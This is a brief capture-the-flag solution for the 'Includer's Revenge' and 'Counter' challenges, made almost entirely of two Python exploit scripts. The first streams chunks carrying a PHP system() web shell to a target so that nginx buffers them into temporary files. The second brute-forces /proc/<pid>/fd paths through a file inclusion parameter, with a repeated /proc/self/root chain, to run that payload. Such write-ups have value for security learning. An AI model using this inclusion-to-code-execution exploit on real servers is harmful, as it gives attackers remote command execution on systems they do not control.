includer's revenge and counter solution - script written for counte but it's idea can be used for includer's revenge too - run both scripts at once - /tmp/b has a chunked body with random content - Including nginx temporary file

rem1.py

#!/usr/bin/env python3
from pwn import remote
import time
# fill /tmp/g with `nc -lvnp 9000 > /tmp/g` and then `curl localhost:9000 -F a=@/dev/urandom` 
q = open("/tmp/g","rb")
z = q.read(1024 * 1024 * 10)
while(True):
    p = remote("49.12.232.139",8008)
    for i in range(1000):
        tosend = z[i*100:i*100+100]
        if(i > 10):
            tosend = tosend
            tosend = tosend[:29]+b'<?php system("/readflag"); ?>'
        p.send(tosend)
    p.close()

rem2.py

#!/usr/bin/env python3
import requests

while(True):
    for k in range(36,38):
        for j in range(10,40):
            r = requests.get("http://49.12.232.139:8008/?page=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/"+str(k)+"/fd/"+str(j))
            if(len(r.text) > 0 ):
                print("IT WORKS!")
                print(r.text)